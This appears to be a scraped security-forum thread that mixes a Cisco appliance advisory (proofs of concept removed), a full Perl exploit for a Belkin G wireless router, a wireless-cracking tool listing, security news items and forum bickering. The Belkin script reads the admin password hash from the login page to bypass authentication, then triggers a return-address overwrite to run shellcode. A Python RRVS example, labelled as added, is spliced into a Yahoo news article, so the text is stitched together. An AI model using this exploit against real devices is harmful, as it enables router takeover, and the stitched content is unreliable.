Name: Stored Cross Site Scripting
Severity: Medium

Due to a lack of input validation on the job_name, job_type, appliances_options and config_master parameters, which are then printed unescaped in the job_name, old_job_name, job_type, appliance_lists and config_master fields.

** PoC removed as requested by Cisco. **

.: [ ISSUE #3 ] :.

Name: CSRF Token is not used
Severity: Low
CVE: CVE-2013-3395

CSRFKey is not used in some areas of the application, which makes it even easier to exploit the Reflected XSS issues. In the /report area of the application, we got no error even when completely removing the CSRFKey parameter.

** PoC removed as requested by Cisco. **

See: http://tools.cisco.com/security/center/viewAlert.x?alertId=29844

.: [ ISSUE #4 ] :.

Name: Lack of password obfuscation
Severity: Low

When exporting the configuration file, even if you tick the "mask password" option, the SNMPv3 password still appears in cleartext.

.: [ CHANGELOG ] :.

* 20/May/2013: - Vulnerability found.
* 27/May/2013: - Vendor contacted.
* 11/Jul/2013: - Public Disclosure

.: [ SOLUTIONS ] :.

Thanks to Stefano De Crescenzo (Cisco PSIRT Team) for his professional way of managing the entire process.

Stored XSS: CSCuh24755
Reflected XSS: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3396
SNMP password issue: CSCuh27268, CSCuh70314
CSRF: http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-3395

.: [ REFERENCES ] :.

[+] Cisco Content Security Management Appliance M170 http://www.cisco.com/en/US/products/ps12503/index.html
[+] Cisco Security Advisories http://tools.cisco.com/security/center/publicationListing.x
[+] !dSR - Digital Security Research http://www.digitalsec.net/

-=EOF=-
-
Description : Belkin G Wireless Router remote code execution proof of concept exploit.
Author : Aodrulez
Source : Belkin G Wireless Router Code Execution - Packet Storm
Code :

+-----------------------------------+
| Belkin G Wireless Router RCE PoC. |
+-----------------------------------+

Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version : 1.18
Hardware : F5D7234-4 v5 (01)

Author : Aodrulez.
Email : atul.alex@orchidseven.com
Twitter : http://twitter.com/Aodrulez

+---------+
| Details |
+---------+

The exploit works in 3 stages.

1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.

This particular model of router is based on 'embedded Configurable operating system' a.k.a (eCos) version 2.0. The shellcode used in the exploit is a dummy one that basically just triggers an exception & crashes the router, forcing it to reboot.

Video Demo : http://www.youtube.com/watch?v=MtrYs-f6X3E

+---------+
| Exploit |
+---------+

#!/usr/bin/perl
use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser = LWP::UserAgent->new;
my $passHash="";
my $url ="";
my $response ="";
my $ip="";
$browser ->timeout(10);

# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode="\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";

sub Authenticate() {
    print "[+] Trying to authenticate.\n";
    $url= "http://$ip/login.stm";
    $response = $browser->get( $url);
    my @aod= $response->content =~ m/var password = "(.*)";/g;
    if(!$aod[0]) {
        print "[-] Damn! Something went wrong. This might not work here \n";
        exit;
    } else {
        $passHash=$aod[0];
        print "[+] Admin Password = $passHash (MD5 Hash).\n";
    }
    print "[+] Time to authenticate you!\n";
    $url = "http://$ip/cgi-bin/login.exe";
    $response = $browser->post( $url, [ 'totalMSec' => "1377121454.99", 'pws' => "$passHash", ,] );
    if( $response->content =~ /index/ ) {
        print "[+] Logged in successfully as 'Admin'!\n";
        print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
    } else {
        print "[-] Login failed! This might not work here \n";
        exit;
    }
    print "\n[+] Continue with exploitation? (Y/N) : ";
    my $temp=<STDIN>;
    if ($temp=~"Y" || $temp=~"y") {
        Exploit();
    } else {
        print "[+] Have fun!\n\n";
        exit;
    }
}

sub Exploit() {
    # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
    # 0x803c0278 is fixed for this device/firmware combination.
    print "[+] Stage 1 : Allocating shellcode.\n";
    if (length($shellcode) > 120) {
        print "[-] Shellcode is too big! (120 bytes Max)\n";
        exit;
    }
    print "[+] Shellcode length : ".length($shellcode)."\n";
    # Fill the rest with nops. Not needed but good to have.
    # Shellcode size should be ideally a multiple of 4 as this is MIPS.
    my $nopsize=120-length($shellcode);
    $shellcode=$shellcode.("\x20"x$nopsize);
    $url = "http://$ip/cgi-bin/wireless_WPA.exe";
    $response = $browser->post( $url, [
        'wpa_authen' => "1",
        'wpa_psk' => '0',
        's_rekeysec' => '900000',
        's_rekeypkt' => '1000',
        'w802_rekey' => '0',
        'encryption' => '3',
        'security_type' => '4',
        'authentication' => '3',
        'encryption_hid' => '3',
        'wpa_key_text' => "ssss",
        'wpa_key_pass' => "$shellcode",
        'obscure_psk' => '1',
        'sharedkey_alter' => '',
        'sharedkey_alter1' => '1',
        ,] );
    if( !$response->content ) {
        print "[-] Damn! Something went wrong. This might not work here \n";
    } else {
        print "[+] Stage 1 seems to have gone well.\n";
    }
    # Stage 2: Trigger Stack Overflow & overwrite RA
    print "[+] Stage 2 : Triggering Return Address overwrite.\n";
    my $junk="A"x32;
    my $s0="BBBB";
    my $s1="CCCC";
    my $ra="\x78\x02\x3c\x80"; #EPC -> 0x803c0278 Fixed for this device/firmware combination.
    my $nop="\x20\x20\x20\x20";
    my $payload=$junk.$s0.$s1.$ra.$nop;
    $url = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
    $response = $browser->post( $url,[ 'pin' => "$payload"]);
    if( !$response->content ) {
        print "[-] Damn! Something went wrong. This might not work here \n";
    } else {
        print "[-] Done! \\m/\n";
    }
}

sub Welcome() {
    print "\n\n+------------------------------------------+\n";
    print "| Belkin G Wireless Router Remote Exploit |\n";
    print "| (Authentication bypass & RCE PoC) |\n";
    print "+------------------------------------------+\n";
    print "[+] By Aodrulez.\n";
    print "\n[+] Usage : perl $0 router_ip";
    print "\n[!] Example : perl $0 192.168.2.1";
    if (!$ARGV[0]) {
        print "\n[-] (o_0) Seriously??\n";
        exit;
    }
    $ip=$ARGV[0];
    print "\n[+] Target IP : $ip\n";
}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.

+-------------------+
| Greetz Fly Out To |
+-------------------+

1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in

+-------+
| Quote |
+-------+

“I would rather die of passion than of boredom.” - Vincent van Gogh.
-
Description : Wi-fEye is designed to help with network penetration testing. It allows the user to perform a number of powerful attacks automatically, including WEP/WPA cracking, session hijacking and more.
Author : Zaid Al-Quraishi
Source : Wi-fEye Wireless Pentesting Tool 1.0 Beta - Packet Storm
Download : HERE
-
With the specter of government surveillance hanging over this post-PRISM world, people are beginning to wonder if the idea of secure email is complete nonsense. Ever since the former National Security Agency contractor Edward Snowden leaked documents revealing the extent of the spy agency’s monitoring activities, many are convinced that email can never be completely safe from prying eyes, and some have even given it up entirely. In recent weeks, two services that promised to offer completely secure email — Lavabit and Silent Circle — have shut down, apparently because they couldn’t stop the government from breaking their security.

But the reality is that email is an integral part of both our personal and professional lives — something that most of us can’t give up without alienating friends and family and ditching our day jobs. We have no choice but to find new ways of making it safe. “E-mail is going to be with us for a long time,” says Bjarni Rúnar Einarsson, a software developer and member of the Icelandic Pirate Party. “We need to do what we can to make it more secure.”

Einarsson is doing his part with Mailpile, an open source web-based e-mail client that you can run on your own computer or in the cloud. With this creation, he hopes to make it easier for everyday users to encrypt their mail — without giving up the sort of search tools they get from a service like Google’s Gmail. The team has already raised over $100,000 dollars on the crowdfunding site Indie GoGo to fund its future development.

It’s a tough time to pitch secure email. But that’s what Einarsson is doing. And it only makes sense. Despite the fallout from Snowden’s leaks, privacy experts realize that most of us can’t help but use email and that our only choice is to secure it as best we can. “Those of us that are going to stay online need to determine the tools that are best for us,” says Rainey Reitman, the director of the activism team at the Electronic Frontier Foundation.
The government may have the technical means to reach public email services and, with National Security Letters, it may have other ways of getting at our messages, but we can minimize these threats — and that’s what Mailpile aims to do.

Einarsson, an ex-Googler, points out that one of the biggest problems with e-mail is that large providers like Gmail make tempting targets for both malicious hackers and overzealous governments. A government service or a hacker with “direct access” to Google could tap thousands, perhaps millions, of e-mail boxes. But if no single e-mail provider had such a large user base, government and attackers would have a much harder time. “It’s more expensive to subpoena hundreds or thousands of [e-mail providers] all over the world than it is to subpoena one big target like Gmail,” Einarsson says.

Yes, you can already sign up for an e-mail account with an alternative hosting provider and move your email into a client like Thunderbird. But Gmail has changed people’s expectations about how e-mail should work, particularly with regard to search. If you decide to switch from Gmail to another provider, you may find the tools sorely lacking. That’s what happened to Einarsson a few years ago. “I’d become addicted to being able to search and process large volumes of e-mail quickly,” he says. “When I started to become uncomfortable with using a proprietary solution living in the cloud I began to look for alternatives and couldn’t find anything. I had a realization of how I could design something that would function like Gmail on my own computer at home, so I wrote the code and it worked.”

Eventually, he reached out to fellow Icelandic developer and activist Smári McCarthy and the two started to build a more fully realized application. But while they’d solved the search issue, they knew that if they wanted people to actually use the product it would have to be as easy to use and as attractive as Gmail.
So, in May, they showed their prototype to Brennan Novak, a Portland, Oregon based user interface designer. Novak’s biggest task is to make the application’s security and privacy tools more easily accessible to average users. Most major e-mail clients have plugins that add support for encryption — Mailvelope for Gmail, Enigmail for Thunderbird or GPGTools for Apple Mail, for example. But PGP encryption remains notoriously cumbersome to use. “Because those things are plugins they don’t have access to your entire client,” Novak says. “For example, the one for Apple Mail is really good, but it doesn’t have access to the address book.” He believes that tighter integration from the very beginning will make the difference.

Even if Novak doesn’t get the interface right, Mailpile is providing an open source platform that other designers can easily modify. Because it’s built on web technologies, such as HTML, CSS and JavaScript, web designers will have an easier time contributing alternative user interfaces and templates. He says that’s actually one of the biggest advantages to Mailpile: it will give people the chance to experiment with the platform in ways that you could never tinker with Gmail. “We need a free software project where people can innovate on these things and add features,” says Einarsson. “When you’re working with a proprietary system in the cloud you have limited options.”

Novak points out that even if they can make PGP easy to use, they’ll still need to encourage adoption by other users. You can have the most secure e-mail client and e-mail server in the world, but if the person you’re sending messages to doesn’t follow good security practices, you’re wasting your time. The key, Novak says, will be in getting people who already have encryption keys to get other people to sign up as well. “My goal is to make it like sending a friend request on a social network,” he says.
Mailpile’s encryption tools could indeed make e-mail more secure, but there are still risks. Even those using PGP to encrypt messages will leave behind information such as who they exchanged messages with, even if the contents of those messages have been read. It’s like having a log of your phone conversations: Someone can tell who you talked to and when, but they don’t know what you actually said. “If you’re actually concerned that someone will know who you’re communicating with, that’s not something that PGP can help,” Reitman says. She says secure real-time chat tools — like the Off-the-Record plugin for the Pidgin and Adium instant message clients, or an anonymous file uploading system like the New Yorker’s open source project DeadDrop — might be better under some circumstances.

But for those stuck in the world of e-mail, a tool like Mailpile offers some hope. It won’t stop a National Security Letter, but it’s something.

Source Wired.Com
-
A recent court filing by the Justice Department redacts Google's name in all instances but one, finally making official what had been an open secret. Google's name might be household fare for the rest of us, but in at least one national security court case, it is still subject to redaction -- as long as the government remembers to obfuscate all instances of the company's name. The Wall Street Journal reported that a Department of Justice court filing on August 23 in the US District Court for the Southern District of New York didn't redact Google's name in one instance from the document [PDF], finally confirming what many had suspected: that Google was the unnamed company fighting the government's use of National Security Letters to gain access to company-owned data. Google is one of the few companies thought to have contested such requests. Electronic Frontier Foundation attorney Matt Zimmerman told Bloomberg in April that the US government has issued more than 300,000 such letters since 2000, which have been contested only by four or five recipients. The letters routinely come with a gag order that prevents the recipient from discussing the case in public. Google recently challenged those gag orders, making it the first company to do so, but the company was ordered to comply with the FBI's secret NSL demands. Source News.Cnet.Com
-
A few minutes ago, the Google Palestine website (google.ps) was hacked and defaced by a group of hackers. "uncle google we say hi from Palestine to remember you that the country in Google map not called Israel. Its called Palestine", the hacker wrote in the defacement. "#Question : What would happens if we changed the country title of Israel to Palestine in Google Maps..!" the defacement message reads. "It would be revolution. So Listen rihanna and be cool". The website was restored within a few minutes. However, we were able to take a screenshot of the defacement.

Update: "Some users visiting google.ps have been getting redirected to a different website; Google services for the google.ps domain were not hacked. We’re in contact with the organization responsible for managing this domain name so we can help resolve the problem", a Google spokesperson said in a statement sent to the Washington Post.

- Source EHackingNews.com
-
A new song from EMINEM - which will be part of the new album MMLP2 - Marshall Mathers LP 2 - release November 2013:
-
Longstanding whistleblower site Cryptome.org is back online after a brief takedown, sparked by its hosting of a list of alleged Japanese terrorists. The takedown by host Network Solutions came as a result of a complaint signed Sima Jiro, who complained that the 114 documents in a file identified as jp-terrorist-files.zip contained “lots of personal information, such as named, DOBs, family structures, workplaces, phone numbers. And also containing lots of documents which are probably classified or confidential”. The complainant also hoped not to be identified to Cryptome: “I sincerely ask you to refrain from sending my request forward to your customer or administrator of “Cryptome” or the uploader of the ZIP file.” Network Solutions initially complied with the request. However – presumably following some discussion between John Young and Network Solutions – it has now been restored. Young is no stranger to takedowns. His site, an anonymous drop-box for whistleblowers which documents both corporate and government shenanigans, has been variously attacked with notices from Microsoft (taken down and then restored), Yahoo! (taken down and restored), and PayPal (banned then unbanned). In 2010, Young famously described Wikileaks' Julian Assange as a “narcissistic individual” who is willing to “sacrifice Bradley Manning* and anyone else to advance their own interests” (*now Chelsea Manning). The correspondence over the latest takedown is here. ® Source TheRegister.co.uk
-
Yahoo! has begun to recycle old usernames from inactive accounts and is starting a three-year paid service so that users can put dibs on the ones that they want.

In July, Yahoo! said it planned to allow people to change their usernames for something a little more personal and asked for volunteers to sign up for the program. It has now begun replying to those who signed up before August 7 to let them know their new online identities.

Those that missed the free offer can pay a one-off fee of $1.99 to register the top five usernames they would like to have on a new watch list. If one of the names is freed up, it will be reassigned and the lucky recipient will have 14 days to either change persona or run multiple Yahoo! accounts, but there's no guarantee that anyone's top five will become available.

In the beta program, Yahoo! reported that David, Michael, and Alex were the most requested male names, with Maria, Jennifer, and Jessica the top picks for women. Dylan Casey, senior director of platforms at Yahoo!, also reported Superman and Batman scored very highly in people's wishlists.

When Yahoo! announced the service, some in the industry worried that it might be a boon to identity thieves, or that mail intended for the original username-creator would start appearing in the inbox of its new owner. To beat that, Yahoo! has created a "Require-Recipient-Valid-Since" system and submitted it to the Internet Engineering Task Force.

In an explanatory blog post, Yahoo! said that if, for example, a new username recipient tries to check into their Facebook account, the social network would ping back an email to Yahoo! containing the Require-Recipient-Valid-Since header, which checks Yahoo!'s servers to see when the last activity on that account was, and rejects the request if necessary. Yahoo! is hoping that will be enough to see off most problems. Presumably charging $2 for a choice of five names will also discourage people trying to scam the system.
® Source TheRegister.co.uk
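The Require-Recipient-Valid-Since check described above, as an added Python example that is not Yahoo!'s code: the header syntax (address; date-time) follows RFC 7293, the account table and the sample header are constructed, and treating a malformed header as absent is this example's own design choice.

```python
import email.utils
from datetime import datetime, timezone

# Constructed account table (not Yahoo!'s data): when the CURRENT owner took over each mailbox.
# A recycled name gets a fresh timestamp on reassignment; an untouched account keeps its old one.
MAILBOX_OWNED_SINCE = {
    "alice@example.com": datetime(2011, 3, 5, tzinfo=timezone.utc),    # original owner
    "davidj@example.com": datetime(2013, 8, 20, tzinfo=timezone.utc),  # recycled, reassigned Aug 2013
}


def parse_rrvs(header_value):
    """Parse 'addr-spec; date-time' (RFC 7293 syntax) into (lower-cased address, aware datetime).

    Raises ValueError for anything that does not carry both parts.
    """
    addr, sep, date_str = header_value.partition(";")
    addr = addr.strip().lower()
    if not sep or "@" not in addr:
        raise ValueError("expected '<address>; <date-time>'")
    try:
        when = email.utils.parsedate_to_datetime(date_str.strip())
    except (TypeError, ValueError) as exc:   # older Pythons raise TypeError on junk dates
        raise ValueError("unparseable date-time") from exc
    if when.tzinfo is None:                  # a '-0000' zone yields a naive datetime: treat as UTC
        when = when.replace(tzinfo=timezone.utc)
    return addr, when


def rrvs_decision(rcpt, header_value):
    """Decide whether to deliver a message carrying Require-Recipient-Valid-Since to `rcpt`.

    The sender asserts it last confirmed `rcpt` as valid at the given time; if the mailbox
    changed hands after that, the message must not reach the new owner. Returns (accept, reply).
    """
    rcpt = rcpt.lower()
    try:
        addr, valid_since = parse_rrvs(header_value)
    except ValueError as exc:
        # Design choice for this example: a malformed header is ignored rather than bounced.
        return True, f"250 2.1.5 OK (RRVS ignored: {exc})"
    if addr != rcpt:
        # The assertion concerns a different address (e.g. the message was forwarded).
        return True, "250 2.1.5 OK (RRVS names a different recipient)"
    owned_since = MAILBOX_OWNED_SINCE.get(rcpt)
    if owned_since is None:
        return False, "550 5.1.1 No such user"
    if owned_since > valid_since:
        # Ownership changed after the sender's confirmation: reject with the RFC 7293 status code.
        return False, "550 5.7.17 Mailbox owner has changed"
    return True, "250 2.1.5 OK"


if __name__ == "__main__":
    # Constructed exchange: a site re-confirmed the address on 1 Jun 2013, before the name was recycled.
    hdr = "davidj@example.com; Sat, 1 Jun 2013 09:23:01 -0700"
    print(rrvs_decision("davidj@example.com", hdr))   # rejected: owner changed on 20 Aug 2013
    print(rrvs_decision("alice@example.com", "alice@example.com; Sat, 1 Jun 2013 09:23:01 -0700"))
```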
-
Three men have been charged with pilfering trade secrets from a Wall Street firm after two of them emailed themselves computer code belonging to their former employer from their company email accounts. Glen Cressman and Jason Vuu, both former employees of Wall Street firm Flow Traders, were each charged with unlawful duplication of computer related material and unauthorized use of secret scientific material after making off with sensitive documents, the Wall Street Journal reports. The 26-year-old Vuu was charged with 20 counts of each offense, having emailed himself various materials related to Flow Traders' trading strategies and valuation algorithms over the period from August 2011 to August 2012. According to Bloomberg, Vuu was aware that he was doing something illicit, because he would sometimes change the file formats of email attachments in an attempt to conceal what it was that he was sending himself. Vuu, who currently lives in California, allegedly shared the purloined code with a college friend, one Simon Lu of Pittsburgh, Pennsylvania, with the aim of starting a new trading company together. Lu has been charged with three counts each of the same offenses as Vuu. But although Vuu's lawyer, Jeremy Saland, admits that Vuu did email himself sensitive code without authorization, he maintains that no real damage was done. "I'm confident that when the DA's office has completed their investigation they will find Flow Traders did not suffer any economic loss," Saland told Bloomberg. "Their algorithms and code weren't taken or used in any malicious way that damaged or compromised their financial security." Meanwhile, Cressman has been charged with two counts each of the same offenses as Vuu, although unlike Vuu, the complaint does not allege that he did so as part of a plan to start up his own firm. "Glen Cressman is innocent," the 26-year-old's attorney told Bloomberg. "He was a great employee for Flow Traders. 
I am confident that when everything is put on the table, the case against him will completely unravel." If convicted of these fairly minor offenses, each of the three men could face a maximum of four years in prison, but experts say it is likely that they wouldn't have to serve any prison time at all. The men are next due in court on November 18, when prosecutors will seek a grand jury indictment that would see the case proceed to trial. ® Source TheRegister.co.uk
-
I'm already scared of this threat. Find yourself another playmate.. I'm too good for you.
-
An idea I have supported.
-
Then why does the "Security News" section still exist? I noticed that in the week when I posted almost nothing, the same thing was being done, just by other users, Nytro among them. Why isn't a special topic made for them? Am I really that disagreeable to you? Well, honestly, you'll have quite a bit of work to do. // And now let's spam, since that's what we know best, right Kabron?
-
If you don't like it, don't come in. Simple. Those 20-30 who come in and read are enough. Oh, I feel sorry for you Kabron, you post so many tutorials and useful things on the forum that they really can't be seen because of my news..
-
It's not my problem that you don't like reading, Kabron. Wildchild: It's nice to talk without knowing each other. // If you have something to comment on, address it to the administrator, Nytro. We all know how to make topics about others, "Kabron". Go look after the chat, you've got no business on the forum.
-
I can't find any logical motivation in your request. Nobody plays Counter Strike 1.6 anymore, except kids under 14 who come in with cheats, swear and think they're the gaming heroes of the world. You need it because you got a VAC ban for cheats and you hope someone here will give you one for free.